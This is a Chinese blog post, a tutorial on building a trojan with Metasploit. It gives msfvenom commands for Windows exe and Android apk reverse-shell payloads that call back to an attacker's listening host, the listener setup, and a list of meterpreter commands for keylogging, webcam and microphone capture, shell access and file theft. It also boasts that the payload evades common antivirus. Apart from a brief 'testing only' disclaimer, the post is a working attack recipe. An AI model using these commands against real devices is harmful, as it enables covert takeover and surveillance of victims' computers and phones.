Kali-Metasploit制作简易木马

发表于 | 更新于 | 分类于 | 浏览数
| 字数统计 1.1k

相信很多人都有这种感觉,觉得那些会做木马病毒的人非常牛逼,当然会自己完全写出来木马病毒的肯定非常牛逼,但是实际上,大部分人都是在前人的基础上修改,很多则是用工具生成,出于兴趣,研究了一段时间”黑”科技,也实践了一下!

总结了几点简单的工具用法,如果你会用这些工具,你会发现也许一个木马没有你像现在那么难做出来!本文是本着研究的精神,所有攻击行为都是测试,请勿用于非法用途!

测试环境:kali linux windows7 windows 10 Android等操作系统

主要工具:metasploit framework

关于所用工具,本文不做过多介绍,这里介绍的使用方法也是最基本最简单的用法:

1.使用metasploit 工具生存一个木马(windows版本),命令如下:

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.47 LPORT=8080 -f exe >demo.exe

LHOST=后面的ip地址是你自己的局域网ip,目前本人所有的攻击测试仅在局域网试过,也就是内网,关于外网的使用暂时不太清楚如何进行!

demo.exe为生成的木马文件,把木马文件拷贝到对方电脑上,双击即可运行!据测试,该木马可以过360安全卫士,电脑管家等常用杀毒软件!这还是在没有做任何加密\加壳的情况下…..不过在有些人的电脑上360可以杀出来!可能是版本不同

2.打开软件,设置好监听,命令依次如下:

1
2
3
4
5
use exploit/multi/handler
set payloads windows/meterpreter/reverse_tcp
set LHOST 192.168.1.47
set LPORT 8080
exploit

3.坐等上钩

此时,只要对方电脑点击运行demo.exe木马文件,这边监听端口就可以收到信息,建立连接!然后可以执行一些入侵指令,对方现在电脑完全在你的掌控之下,常用命令如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
sysinfo     //查看攻击主机的系统信息
kill         //结束进程
ps          //查看进程
reboot      //重启电脑
reg        //修改注册表
shell        //获取shell
shutdown    //关闭电脑
keyscan_start //开启健盘记录功能
keyscan_dump //查看健盘记录信息
keyscan_stop //停止健盘记录
download     //下载文件
upload        //上传文件
uictl enable keyboard   //获取键盘鼠标控制权
record_mic    //音频录制
webcam_chat   //查看摄像头接口
webcam_list   //查看摄像头列表
webcam_stream  //摄像头视频获取
................

4.生成Android版本的木马,其实步骤和上面差不多

1
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.47 LPORT=8080 -r >demo.apk

只要你下载安装到你手机上,你手机基本上也是别人的了,获取联系人\通讯录\定位打开摄像头\照片…….而且经测试,小米手机自带的安全中心对此木马完全没用!

不过,据我暂时了解的知识,距离一个完整的木马还有点距离:

  1. 杀毒软件.据我测试,腾讯的电脑管家就是垃圾,扫描不出来我生成的木马,360基本上一扫就出来,经过简单编码加密后,360会提示风险程序,而系统自带的windows defender更是一点点用都没.不过要想真把木马做成免杀还得花点功夫…….

  2. 木马持续后门.所谓持续后门就是能让木马开机后自启,经测试,msf自带的2种方法无效…..暂时未找到可行性方法!

  3. 外网控制.这是一个大问题,比较难解决,现在的攻击都是基于同一个局域网内!

  4. 权限问题.360是个麻烦事,在有些机子上进行操作,比如打开摄像头,360会有提示…..而且木马暂时还没法子终结360的进程,所以蛋疼!

在日常生活中,专门去攻击某些个人的情况很少,很多时候黑客都是采用自动化工具遍地撒网,利用一些公开的漏洞进行攻击!普通人能做的只是让自己别中这些自动化黑客工具的招就行了,如果某些个人或者组织想黑你,真的很简单………….